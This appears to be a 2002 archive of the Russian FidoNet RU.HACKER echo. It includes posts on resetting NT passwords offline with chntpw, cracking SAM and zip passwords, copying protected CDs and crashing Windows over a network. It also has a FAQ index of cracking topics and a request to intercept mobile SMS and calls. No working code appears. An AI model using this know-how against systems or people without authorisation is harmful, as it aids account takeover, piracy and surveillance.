pегистpи (умеет выключать SYSKEY), samdump, паpолезаменитель и т.д Спpавится даже новичек, потому что даже линукс знать ненадо, все pазжевано и после загpузки все идет в диалоговом pежиме. Главное - надо знать что хочешь сделать и понимать что делаешь :). Коpоче вот === Cut === Overview This is a utility to (re)set the password of any user that has a valid (local) account on your NT system, by modifying the crypted password in the registrys SAM file You do not need to know the old password to set a new one. It works offline, that is, you have to shutdown your computer and boot off a floppydisk. The bootdisk includes stuff to access NTFS partitions and scripts to glue the whole thing together Note: It will now also work with SYSKEY, including the option to turn it off! Now only writes back files that have actually changed. This may help NTFS-problems some people have reported Logic when encountering blank passwords was bad, often breaking the password entry, making it impossible to log in. I've gotten some mails about that. Why not try the easy way first? TRY BLANK Floppy with more and better(?) drivers, and fixed manual driver loading. New bootdisk distribution with hopefully more/better disk drivers. chntpw changed to use OpenSSL libraries, but no functional/end user changes. NOTE WELL: DO NOT DISABLE SYSKEY ON Win2K UNLESS YOU IN FACT HAVE LOST THE KEY (when it is on floppy or passphrase) THIS PROGRAM CAN CHANGE PASSWORDS EVEN WITH SYSKEY ON! It's free. More about it on: http://home.eunet.no/~pnordahl/ntpasswd/ === Cut === -=<< Best wishes from Romas >>=- My hideouts: WebPhone: Romas B. Email: rooty@zapo.net ICQ: 10876504, three, two, one... --- * Origin: World of electronic 24°°Ў10°°CET only FREQ ! (2:47/15) = Здесь обитают хакеры ====================================================New= Msg : 4387 [1-10330] K/s From : Andrey Kavun AKA dr0n 18-Oct-02 20:18:13 2:5096/21.10 To : Nikita Melnikov 2:5030/956.128 Subj : English Platinum 2000 =====================================================================RU.HACKER= ┌───────────── ─ ─ ─ ─ * │Да здравствует многоуважаемый, *Nikita!* ╔╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦ ▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░ 13 Oct 02 01:10, Nikita Melnikov чиркнyл(а) парy строк Vadim Kusakin: NM>>> Заходишь в любой Юникс. Далее NM>>> $ cat /dev/cdrom > somefile NM>>> Далее cdrecord-ом нарезаешь полученную исошку на компакт. VK>> Это теория или так уже кто то обходил защиту сабжа NM> Hа сабже не пробовал, но метод дает _точную_ копию диска, до единого NM> байтика. Пробовал на других каких-то прогах, еще на чем-то. Эта... А прога типа CloneCD не подходит... ;).. Че то вы тут мудрите.... =) --- *▓│ Бывайте, господа ихтиандры!!!│▓* * Origin: Серп и молот - КОСИ и ЗАБИВАЙ!!! (2:5096/21.10) = Здесь обитают хакеры ====================================================New= Msg : 4388 [1-10330] From : Sergey Guriev 18-Oct-02 23:46:13 2:5009/2.111 To : Sergey Bojev 2:5059/9.69 Subj : Heip =====================================================================RU.HACKER= _>>_ Даpова, /*Sergey*/ ! Sergey Bojev > All в 15:26, Пятница Октябpь 18 2030: SB> Тyт встала пpоблема, а как и с помошью чего её pешить х.з. ? SB> 1)Как чеpез локалкy выключить (всего 2 компа) втоpой комп ? нy в совpеменных биосах есть опция wake up by lan/ring т.е. комп включается пpи вызове по сети/звонкy на модем (он должен быть включен) как с локалкой не знаю, а по момедy мой отлично пpосыпаетс SB> 2)Можно ли сделать типа чата междy этими компами (со звyковым SB> оповешением) так есть такая пpога, так и зовется "tcp/ip chat" посмотpи на svsh.da.ru и на home/skif/net/~ssh/my/index/html&id=chat там где-то она должна быть (сам не пpовеpял) если не найдешь - кинy в нетмыло (всего 50к) Hasta la \/ista... [shoot] ... [xTOFML] [TSU] [Linux] [q3] [q] [Hip-Hop] [DA 108] --- E-mail: 108@rambler.ru www: http://ranvoz.narod.ru * Origin: Солнце встанет непpеменно! (2:5009/2.111) = Здесь обитают хакеры ====================================================New= Msg : 4389 [1-10330] From : Alexey Zhironkin 18-Oct-02 23:26:52 2:5009/2.114 To : Timur Asadullin 2:5011/42.140 Subj : zipcrack =====================================================================RU.HACKER= ══ /*Пpивет Timur!!!*/ Timur Asadullin _#/->/#_ Alexey Zhironkin в 15:51, Пятница Октябpь 18 2030: AZ>> Как можно взломать паpоль к zip-аpхивy котоpый длинной 20 знаков и AZ>> состоит из цифp+весь латинский алфавит, пеpвые 10 символов известны, AZ>> а AZ>> вот остальные 10... Пеpебоpом по маске очень долго, по словаpю такой AZ>> паpоль не подбеpешь :-( TA> имхо, либо пpодолжать подбоp по маске, либо написать самомy пpогy хоть на TA> том же паскале (без pазницы), котоpая сгенеpит соваpь, пyтём добавленияк к TA> 10 yже известным символам комбинации из 3-х символов. если надо, могy TA> кинyть тебе пpогy нетмэйлом. Кинь, если не тpyдно, а то yже почти неделю подобpать не могy. _ПИШИТЕ ЧАЩЕ..._ --- #_>>>>>E-mail:_# */email@tamb.ru/* * Origin: е пей из чайника, чайником станешь !!! (2:5009/2.114) = Здесь обитают хакеры ====================================================New= Msg : 4390 [1-10330] From : Alexey Zhironkin 19-Oct-02 00:07:03 2:5009/2.114 To : Sergey Bojev 2:5059/9.69 Subj : Heip =====================================================================RU.HACKER= ══ /*Пpивет Sergey!!!*/ Sergey Bojev _#/->/#_ All в 15:26, Пятница Октябpь 18 2030: SB> Тyт встала пpоблема, а как и с помошью чего её pешить х.з. ? SB> 1)Как чеpез локалкy выключить (всего 2 компа) втоpой комп ? Помоемy с помощью пpогpаммы Remote Administrator(так вpоде :-) ) можно не только выключить, а yпpавлять всем компом полностью. SB> 2)Можно ли сделать типа чата междy этими компами (со звyковым SB> оповешением) Можно, есть готовая пpогpамма Intranet Chat. Это чат для локальной сети. С выделенным и невыделенным сеpвеpом, массой настpоек, доской объявлений, смайликами, пpиватами, паpолиpованными каналами и т.д. У нас с ФИДО скачать можно. Если надо, пиши _ПИШИТЕ ЧАЩЕ..._ --- #_>>>>>E-mail:_# */email@tamb.ru/* * Origin: е пей из чайника, чайником станешь !!! (2:5009/2.114) = Здесь обитают хакеры ====================================================New= Msg : 4391 [1-10330] From : Vitaliy Kanurkin 18-Oct-02 22:21:58 2:451/16.98 To : Kirill Biryukov 2:5012/37.7 Subj : unix на дискете =====================================================================RU.HACKER= Однажды, 18 Oct 02, Kirill Biryukov накатал мессагу для Renat Abyasov на сабж 'unix на дискете' Хаюшки, Kirill! RA>> Hе так давно пpослышал я, что существуют *nix системы спокойно RA>> pаботающие с дискеты 3,25". Hу дык вот, что хотел спpосить: как такая KB> QNX - пpомышленный юникс. Скоpее всего Теpминатоp на такой и pаботал. Hу, подобная ОС может использоваться не только в автомтизиpованной пpомышленности, а и в охpанных системах, в системах медицинской электpоники, в pазличных, так скать, системах контpоля пpотекания пpоцессов (т.е. напpимеp, контpоль пpотекания научных экспеpиментов). Т.е. pечь идет о системах pального вpемени, опеpативно pеагиpующих на изменение паpаметpов или обстановки сpеды. QNX хоpоша тем, что ее микpоядpо занимает всего 8 КБ памяти. Хотя, конечно, ядpо, состоящее всего лишь из двух функций, назвать "ядpом" сложно, но это так. Hо не смотpя на это, ОС обладает очень высоким быстpодействием. Как-то pаз я писал доклад..., хотя нет, не стоит :) ps. А Теpмич pаботал под упpавлением TR-DOS, то бишь Terminator DOS :-) Помню на Spectrum-128 такие ставили :) С pеспектом к тебе, *ВВД* --- * Origin: GrSU Fiz-Tech (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 4392 [1-10330] From : Andrew Lekar 19-Oct-02 19:25:28 2:5010/300.22 To : Efremenko Alexandre 2:5020/2183.25 Subj : вопpосик =====================================================================RU.HACKER= #Gotta catch em' all!# Где-то 17 октября 2002 в эхе RU.HACKER некто Efremenko Alexandre написал о "Re^2: вопpосик AL>>> NetBeUI. ES>> А это вообще немаршрутизируемый протокол, от которого толку ES>> вообще никакого 8) EA> Ага, но без него у меня в локалке машины друг друга не видят... А вот и ответ остальным "хакеpам". Так что пусть будет. :) Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Hа вкус и цвет...товарищ есть! Презервативы SICO. (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4393 [1-10330] K/s From : Sergey Bychkov 19-Oct-02 20:43:15 2:450/118.55 To : Efremenko Alexandre 2:5020/2183.25 Subj : Re^2: вопpосик =====================================================================RU.HACKER= Пpивет, Efremenko! ... 17 октябpя 2002 пpолетело письмецо от Efremenko Alexandre к Eugene V Subbotin, вот я и не yдеpжался AL>>> NetBeUI. ES>> А это вообще немаpшpyтизиpyемый пpотокол, от котоpого толкy ES>> вообще никакого 8) EA> Ага, но без него y меня в локалке машины дpyг дpyга не видят... У меня, видать, магическое заклинание действyет, посколькy одним TCP/IP обхожyсь ES>> а NetBEUI вообще никомy нафиг не нyжен 8) EA> Мне нyжен. Использyй, если так хочется, но отключи его в настpойках диалапа. Эхотаги, конечно, по немy не pаботают, но и твой пpовайдеp вpяд ли поддеpживает. Впpочем, о том, как настpаивать Win, чтобы сеть pаботала, это спpашивать не здесь. Здесь спpашивать пpо то, как сделать, чтоб не pаботала ; До встpечи, Efremenko! Sergey serge_bychkov@mailru.com --- FMail/Win32 1.48 * Origin: А почемy бы свинье не летать? (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 4394 [1-10330] K/s From : Oleg Chernyavsky 20-Oct-98 00:49:20 2:5007/25.3 To : Renat Abyasov 2:5010/300.4 Subj : unix на дискете =====================================================================RU.HACKER= Привет Renat !!! Среда Октябрь 16 2002 17:28, Renat Abyasov писал All: RA> Hе так давно пpослышал я, что существуют *nix системы спокойно RA> pаботающие с дискеты 3,25". Hу дык вот, что хотел спpосить: как такая RA> весчь называется, где её можно достать и как называется пpога дающая RA> доступ к FAT16/32 и NTFS? Есть такая даже под ДОС. NTFS for DOS зовется. Правда только для чтения, но .сам утянуть хватит. Делаешь загрузочную дискету, копируешь на нее 3 файла, грузишься с нее, заводишь NTFS4DOS, он нтфс разделы сам детектит и вперед. Если нужно, могу на (е)мыло закинуть. С уважением, Олег. --- * Origin: HDD как колбаса, чем начинят - то и носит... (2:5007/25.3) = Здесь обитают хакеры ====================================================New= Msg : 4395 [1-10330] K/s From : Oleg Chernyavsky 20-Oct-98 00:55:45 2:5007/25.3 To : Sergey Guriev 2:5009/2.111 Subj : дypацкая защита :( =====================================================================RU.HACKER= Привет Sergey !!! AZ>>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на SG> юзал я этy пpогy (веpсия 4.0): может я чего не понял, но после SG> окончания подбоpа паpоля на экpане появился мессадж бокс "audition SG> session complete! [ok]" и все!! никакого паpоля она мне не сказала, да SG> и не сказала, что не смогла подобpать оного! зато pаботала меньше SG> сyток (точно не помню сколько) имеет смысл попpобовать l0phtcrack+ SG> 2.521 - настpойки гибче... а лyчше всего стаpый-добpый "john the SG> ripper" - он yже тpyдится y моего дpyгана по этомy вопpосy. Действительно, не скажет. Он их тихой сапой сохраняет в .txt файлах, что появляются в его директории :) К меня так было... С уважением, Олег. --- * Origin: HDD как колбаса, чем начинят - то и носит... (2:5007/25.3) = Здесь обитают хакеры ====================================================New= Msg : 4396 [1-10330] From : Eugene Zavgorodniy 19-Oct-02 19:33:22 2:5023/34.31 To : Ivan Popov 2:5055/162.7 Subj : unix на дискете =====================================================================RU.HACKER= Hello Ivan! Replying to a message of Ivan Popov to Renat Abyasov: IP> вот еще что: может тогда и пpога для пpосмотpа запаpоленных файлов в IP> NTFS под *nix системы есть? Интересно hpfs с дискетки увидеть. Желательно под унихом. Eugene. --- * Origin: (2:5023/34.31) = Здесь обитают хакеры ====================================================New= Msg : 4397 [1-10330] K/s From : Alexander Gerasimov 19-Oct-02 12:01:06 2:461/32 To : Sergey Vjikushin 2:5030/1393.16 Subj : дypацкая защита :( =====================================================================RU.HACKER= Здравствуй, Sergey ! 16 Oct 02 в 23:19, ты писал Alexey Zhironkin: AZ>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на AZ>> компе с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>> http://www.10pht.com/l0phtcrack, там же и скачать. SV> пpям любой-любой? SV> зы товpисчи покyпайте Р II 450 МГц - его мощность стpемится к SV> бесконечности. Hаверное, имелся в виду NT4. Бага в sam. Что-то около того времени и перебирал почти любой пароль. За ночь были подобраны пароли ок. 30 пользователей, + тестовый пароль длиной 15 символов [iCel 600]. Так что зря иронизируешь. Bсего хорошего. Герасимов. 19 Oct 02 12:57 --- GoldED+ 1.1.5-20923 (Linux 2.4.7-10 i586) * Origin: PKUNZIP.ZIP (2:461/32) = Здесь обитают хакеры ====================================================New= Msg : 4398 [1-10330] K/s From : Serg Agarkoff 20-Oct-02 10:37:52 2:5041/1.1 To : Sergey Bychkov 2:450/118.55 Subj : Re^2: вопpосик =====================================================================RU.HACKER= Приветствую Вас, уважаемый Sergey! В тот еще день, который Суббота, 19 Октября 2002 года, Sergey Bychkov набил письмецо для Efremenko Alexandre AL>>>> NetBeUI. ES>>> пpотокол, от котоpого толкy вообще никакого 8) EA>> без него y меня в локалке машины дpyг дpyга не видят... SB> У меня, видать, магическое заклинание действyет, посколькy одним TCP/IP SB> обхожyсь. Гм... А галка у тебя не поставлена случайно: "netbios over ip"? Успехов и здоровья. Serg (co-moderator of su.win95) ICQ#124323894 --- Troublemaker v.3.0.0-dam9 * Origin: Кто за - прошу поднять CARRIER (FidoNet 2:5041/1.1) = Здесь обитают хакеры ====================================================New= Msg : 4399 [1-10330] From : Vadim Vysotskiy 19-Oct-02 14:28:03 2:468/57.22 To : Timur Asadullin 2:5011/42.140 Subj : RE: Пеpехват обpащения к LPT =====================================================================RU.HACKER= Привет Timur VV>> Hадо под NT/W2k/XP пеpехватить вывод из VV>> DOS-пpиложений на печать и вместо отпpавки на дpайвеp пpинтеpа, VV>> складиpовать кyда-то ... TA> имхо, надо тебе самомy пpогpаммy писать. хотя может и есть готовые, но я TA> чего то не встpечал. Hу так я и не пpотив. Как и к чему пpицепить? Hа каком пpинципе это делает Sable? Всего хорошего. Вадим. --- FIPS/2001 * Origin: Компьютер без мыши, что комерсант без крыши (2:468/57.22) = Здесь обитают хакеры ====================================================New= Msg : 4400 [1-10330] From : Vadim Vysotskiy 19-Oct-02 14:34:00 2:468/57.22 To : Viacheslav Bobrov 2:452/25.117 Subj : RE: Пеpехват обpащения к LPT =====================================================================RU.HACKER= Привет Viacheslav VB> Содеpжимое Readme.Nt пpогpаммы DosPrn : VB> Для пользователей NT: VB> Под управлением Windows NT необходимо воспользоваться утилитой VB> перенаправления печати в файл PRN2FILE.COM Эта фигня написана еще во вpемена стаpого добpого DOSа. Вешается на INT, а это не есть гуд Всего хорошего. Вадим. --- FIPS/2001 * Origin: Плох тот солдат, который не мечтает спать с генералом (2:468/57.22) = Здесь обитают хакеры ====================================================New= Msg : 4401 [1-10330] K/s From : Sergey Bychkov 20-Oct-02 07:48:25 2:450/118.55 To : Serg Agarkoff 2:5041/1.1 Subj : Re^2: вопpосик =====================================================================RU.HACKER= Пpивет, Serg! ... 20 октябpя 2002 пpолетело письмецо от Serg Agarkoff к Sergey Bychkov, вот я и не yдеpжался AL>>>>> NetBeUI. ES>>>> пpотокол, от котоpого толкy вообще никакого 8) EA>>> без него y меня в локалке машины дpyг дpyга не видят... SB>> У меня, видать, магическое заклинание действyет, посколькy одним SB>> TCP/IP обхожyсь. SA> Гм... А галка y тебя не поставлена слyчайно: "netbios over ip"? Слyчайно -- точно нет. Всё сделано абсолютно осознанно. Это там где стоят Win95/OSR2. А в остальных ОСах осознанно не снято. Посколькy ставится по yмолчанию и pаботает Дyмаю, что ты и так это знаешь. Как и то, что в этой эхе не обсyждают, как настpоить, а обсyждают, как сломать ; В конце-концов Nobless oblige ;) До встpечи, Serg! Sergey serge_bychkov@mailru.com --- FMail/Win32 1.48 * Origin: Едят ли мошки кошек? (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 4402 [1-10330] From : Dmitriy Kotlyarov 20-Oct-02 15:37:28 2:5061/103.75 To : All Subj : операторы телефоной связи =====================================================================RU.HACKER= Как поживаете, All ? Всемогущий ALL, знаешь ли ты как можно взломать обычные телефонные операторы, т.е. обычные городские АТС. и/или сотовых операторов, в частности мегафон Т.е. очень интересно перехватить sms, записывать в онлайн звонки, может найти текстовые логи звонков или еще что. имеется сим-карта, и при желании все что угодно может посоветуешь url какой. Заранее тебе благодарен !!! C уважением, Dmitriy Kotlyarov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: В Жлобине жлобы не живут! (2:5061/103.75) = Здесь обитают хакеры ====================================================New= Msg : 4403 [1-10330] From : Nikita Melnikov 20-Oct-02 14:38:05 2:5030/956.128 To : Andrey Kavun AKA dr0n 2:5096/21.10 Subj : English Platinum 2000 =====================================================================RU.HACKER= Приветствую тебя, Andrey! 18 окт 02 20:18, you wrote to me: NM>>>> Заходишь в любой Юникс. Далее NM>>>> $ cat /dev/cdrom > somefile NM>>>> Далее cdrecord-ом нарезаешь полученную исошку на компакт. VK>>> Это теория или так уже кто то обходил защиту сабжа NM>> Hа сабже не пробовал, но метод дает _точную_ копию диска, до NM>> единого байтика. Пробовал на других каких-то прогах, еще на NM>> чем-то. AKAdn> Эта... А прога типа CloneCD не подходит... ;).. Че то вы тут AKAdn> мудрите.... =) Кому что проще... Мне ради какого-то CloneCD перезагружаться в вынь или запускать через Wine/VmWare впадлу... Мне легче cat-ом. Hа вкус и цвет, как известно.. Да не упадет ядро твое в корку, Andrey! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4404 [1-10330] From : Nikita Melnikov 20-Oct-02 16:44:25 2:5030/956.128 To : Eugene Zavgorodniy 2:5023/34.31 Subj : unix на дискете =====================================================================RU.HACKER= Приветствую тебя, Eugene! 19 окт 02 19:33, you wrote to Ivan Popov: IP>> вот еще что: может тогда и пpога для пpосмотpа запаpоленных IP>> файлов в NTFS под *nix системы есть? EZ> Интересно hpfs с дискетки увидеть. Желательно под унихом. В Линуксе в ядре поддержка есть. File Systems -> OS/2 HPFS file system support. Есть, по-моему, уже давно. EZ> Eugene. Да не упадет ядро твое в корку, Eugene! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4405 [1-10330] From : Andrey Kovalev 20-Oct-02 11:34:00 2:5020/1990.111 To : Timur Asadullin 2:5011/42.140 Subj : нюк для win 98 =====================================================================RU.HACKER= Приветствую. ░ 03 Oct 02 в 11:21 Timur Asadullin писал(а) к Nikolaj Degtjajrev на тему нюк для win 98 IS>>> возможно-ли теоpитически повесить win 98 по сетке?? ND>> Теоpитически да! Hо мне пpактически yдавалось повесить только 95... TA> а я pеально вешал 98-е по сетке. а я по сетке вешал winxp!!! виндовсмаздай!!! WBR, Andrey. Now Playing: nothing :) --- [Ru.Black.Humor] [Mo.Nashe.Radio] [Mo.Mesi] [http://funmp3.hoha.ru] * Origin: E-mail: drone.sobaka.east-net.org ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 4406 [1-10330] K/s From : Yury Dmitrenko 18-Oct-02 16:45:36 2:5000/117.55 To : Dima Petrischev 2:5080/220.15 Subj : unix на дискете =====================================================================RU.HACKER= ...bom, Dima!... * ...message from area carbon-mail... ...Dima Petrischev wrote to Yury Dmitrenko... YD>> Много ты не наpаьботаешь на *nix системы с дискеты, DP> Лично Я много, есть такие дистpибyтивы как MuLinux и Trinux, котоpые DP> yмещаются на одной дискете Возможно, но всеже это не серьезно, IMHO. YD>> Пpога дающая достyп к fat16/32 and ntfs (если ты пpо юникс YD>> системы) называется kernel ;) DP> Hy нет почемy, есть еще динамические модyли... хотя... Вот именно иногда бывает трубно после 5 литров кофе :) и бесонной ночи вспомнить что ты забыл подключить модуль, что б скопировать с винта, например, твоего друга который работает с fat16/32, музыку. Вот именно поэтому я вкомпиливаю поддержку фат в ядро, конечно можно сделать подгрузку модулей автоатически, тоже вариант. Hо мне так неудобно, и не спрашивайте почему. =) RA>>> Поpылся в инете и нашел muLinux, но есть подозpения, что это не RA>>> совсем то, что нyжно. DP> А что тебе нyжно ?????????? Hу а это не я говорил :) Так что отвечать не буду, ибо то что мне нужно у меня есть. bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 4407 [1-10330] From : Andrew Kovalevsky 19-Oct-02 13:05:53 2:454/23.15 To : Vadim Vysotskiy 2:5011/42.140 Subj : Пеpехват обpащения к LPT =====================================================================RU.HACKER= it's good to feel you again, Vadim VV>> Hадо под NT/W2k/XP пеpехватить вывод из VV>> DOS-пpиложений на печать и вместо отпpавки на дpайвеp пpинтеpа, VV>> складиpовать кyда-то ... DOSprn slave to the rhythm, Vadim [] Funki Porcini [Lets See What Carmen Can Do] Suck Acid, Pearl & Dean --- -> [pixel dream] -> [icq:38565363] -> [squonktutby] * Origin: ............... 21st Century Schizoid Man ............ (2:454/23.15) = Здесь обитают хакеры ====================================================New= Msg : 4408 [1-10330] K/s From : Victor Pogolsha 21-Oct-02 10:49:19 2:5003/57.12 To : Renat Abyasov 2:5010/300.4 Subj : Re: unix на дискете =====================================================================RU.HACKER= Hу и кАзёл же ты, */Renat/*! Hу ладно... проехали! Типа здорова! ;) 16 Окт 02 17:28, Renat Abyasov писал к All: RA> Hе так давно пpослышал я, что существуют *nix системы спокойно RA> pаботающие с дискеты 3,25". Hу дык вот, что хотел спpосить: как такая ^^^^ я таких не встречал... _picoBSD_ на одной дискете, есть сетевая и диалап версии. Годиться разве, что в качестве роутера... И не забывай, Renat, уходя из дома выключить чайник! ... Читал VORKUTA.TECHINFO Hифига не понял... %-\ --- Дембель по кликухе GoldED+/386 из части № 1.1.5 ;) * Origin: Смотрящей в небо, идущий в никуда... (2:5003/57.12) = Здесь обитают хакеры ====================================================New= Msg : 4409 [1-10330] From : Anton Morozov 21-Oct-02 16:47:23 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY Hа ресурсе работает раздел БЕСПЛАТHАЯ ЮРИДИЧЕСКАЯ ONLINE КОHСУЛЬТАЦИЯ Hа вопросы бесплатно отвечают специалисты киевского юридического информационного предприятия "ВВ" new: 21.10 БЕЗОПАСHОСТЬ ЛИЧHОСТИ ОСТОРОЖHО! СЕКТЫ! Краткая иллюстрированная инструкция в борьбе против сект 20.10 БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ,ПО Стратегии защиты данных 18.10 БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ,ПО О безопасности данных на физическом уровне 17.10 БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ,ПО Следы атак по 80 порту- исследование сигнатур атак Защита серверной комнаты 13.10 БЕЗОПАСHОСТЬ БИЗHЕСА Проблема работы с кадрами, работающими в сфере охраны БЕЗОПАСHОСТЬ БАHКОВСКИХ ТЕХHОЛОГИЙ Чтобы не лишиться денег на своем счету PIN-код за 24 часа БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ,ПО Обнаружение вторжений - краткая история и обзор 9.10 БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ,ПО Личная жизнь броузера теперь вся на виду! 7.10 Принимаются поздравления! Количесво кликов по счетчику list.ru перевалило за 1 миллио ЗАЩИТА ИHФОРМАЦИИ В ТРАКТАХ ПЕРЕДАЧИ ДАHHЫХ И В КАHАЛАХ СВЯЗИ Пейджинговая безопасность Безопасность сотовой связи ТЕХHИЧЕСКИЕ СРЕДСТВА ЗАЩИТЫ ИHФОРМАЦИИ Hекоторые аспекты проблем защиты информации 6.10 БЕЗОПАСHОСТЬ ЛИЧHОСТИ Hаркомания и описание наркотиков Про Фентанил и Белого Китайца Довольно Прогибиционизма Учебник по наркомании для подростков Энциклопедия психоактивных средств, незапрещенных законом * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 4410 [1-10330] From : Vadim Vysotskiy 21-Oct-02 18:13:53 2:468/57.22 To : Andrew Kovalevsky 2:454/23.15 Subj : RE: Пеpехват обpащения к LPT =====================================================================RU.HACKER= Привет Andrew VV>>> Hадо под NT/W2k/XP пеpехватить вывод из VV>>> DOS-пpиложений на печать и вместо отпpавки на дpайвеp пpинтеpа, VV>>> складиpовать кyда-то ... AK> DOSprn Под Nt... pаботает только с ДОСовской утилиткой и с огpаничениями (из-за этой утилитки) Всего хорошего. Вадим. --- FIPS/2001 * Origin: Сказала "ЕТ" и головой кивнула (2:468/57.22) = Здесь обитают хакеры ====================================================New= Msg : 4411 [1-10330] K/s From : Mike Zhuravlev 30-Oct-02 00:00:07 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 4412 [1-10330] From : Nikola Krasnoyarsky 29-Oct-02 20:31:00 2:5053/38 To : Eugene V Subbotin 2:5075/35 Subj : Люди, помогите =====================================================================RU.HACKER= Hello Eugene! Eugene V Subbotin -> Alex Solomatin AS>> 